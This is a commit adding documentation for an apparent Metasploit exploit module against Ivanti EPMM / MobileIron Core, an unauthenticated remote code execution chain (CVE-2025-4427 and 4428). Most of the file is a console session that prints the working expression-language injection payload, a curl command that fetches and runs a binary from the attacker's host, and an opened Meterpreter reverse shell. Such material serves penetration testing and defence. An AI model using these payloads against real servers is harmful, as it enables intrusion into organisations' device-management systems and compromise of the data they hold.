Add ivanti_epmm_rce_cve_2025_4427_4428.md

remmons-r7 · web-flow · commit 68929a50fad1 · 2025-05-28T17:35:34.000-05:00
Documentation for ivanti_epmm_rce_cve_2025_4427_4428.
diff --git a/documentation/modules/exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.md b/documentation/modules/exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.md
@@ -0,0 +1,122 @@
+## Vulnerable Application
+This module exploits an unauthenticated remote code execution exploit chain for Ivanti EPMM,
+tracked as CVE-2025-4427 and CVE-2025-4428. An authentication flaw permits unauthenticated
+access to an administrator web API endpoint, which allows for code execution via expression
+language injection. This module executes in the context of the 'tomcat' user. This module
+should also work on many versions of MobileIron Core (rebranded as Ivanti EPMM).
+
+## Testing
+To set up a test environment:
+1. Set up an Ivanti EPMM or MobileIron Core VM appliance.
+2. Configure basic networking and confirm that the web service on port 443 is reachable.
+3. Follow the verification steps below.
+
+## Options
+No custom options exist for this module.
+
+## Verification Steps
+1. Start msfconsole
+2. `use exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `run`
+
+## Scenarios
+### Ivanti EPMM (MobileIron Core) Linux Target
+```
+msf6 > use exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > show options 
+
+Module options (exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             yes       Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to Ivanti EPMM
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST                            yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
+
+
+   When FETCH_FILELESS is false:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      EUAqTWOdJ        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set RHOSTS 192.168.181.148
+RHOSTS => 192.168.181.148
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set LHOST 192.168.181.129 
+LHOST => 192.168.181.129
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set FETCH_SRVPORT 9191
+FETCH_SRVPORT => 9191
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > check
+[*] Payload pt. 1/1: id
+[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('id').getInputStream()).useDelimiter('%5C%5CA').next()}
+[*] Command pt 1 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'."]}]}
+[+] 192.168.181.148:443 - The target is vulnerable. Successfully executed command
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > run
+[*] Command to run on remote host: curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw;chmod +x /var/tmp/lktEmYrRyAfw;/var/tmp/lktEmYrRyAfw&
+[*] Fetch handler listening on 192.168.181.129:9191
+[*] HTTP server started
+[*] Adding resource /rwwkKagVT2DQx25BSXklfw
+[*] Started reverse TCP handler on 192.168.181.129:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Payload pt. 1/1: id
+[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('id').getInputStream()).useDelimiter('%5C%5CA').next()}
+[*] Command pt 1 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'."]}]}
+[+] The target is vulnerable. Successfully executed command
+[*] Attempting to execute payload
+[*] Payload pt. 1/3: curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw
+[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw').getInputStream()).useDelimiter('%5C%5CA').next()}
+[*] Client 192.168.181.148 requested /rwwkKagVT2DQx25BSXklfw
+[*] Sending payload to 192.168.181.148 (curl/7.29.0)
+[*] Command pt 1 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'."]}]}
+[*] Payload pt. 2/3: chmod +x /var/tmp/lktEmYrRyAfw
+[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('chmod +x /var/tmp/lktEmYrRyAfw').getInputStream()).useDelimiter('%5C%5CA').next()}
+[*] Command pt 2 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('chmod +x /var/tmp/lktEmYrRyAfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('chmod +x /var/tmp/lktEmYrRyAfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'."]}]}
+[*] Payload pt. 3/3: /var/tmp/lktEmYrRyAfw &
+[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('/var/tmp/lktEmYrRyAfw &').getInputStream()).useDelimiter('%5C%5CA').next()}
+[*] Meterpreter session 1 opened (192.168.181.129:4444 -> 192.168.181.148:38980) at 2025-05-28 16:31:52 -0500
+[*] No command pt 3 response expected
+
+meterpreter > getuid 
+Server username: tomcat
+meterpreter > sysinfo 
+Computer     : core.mobileiron.local
+OS           : CentOS 7.6.1810 (Linux 3.10.0-1160.6.1.el7.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
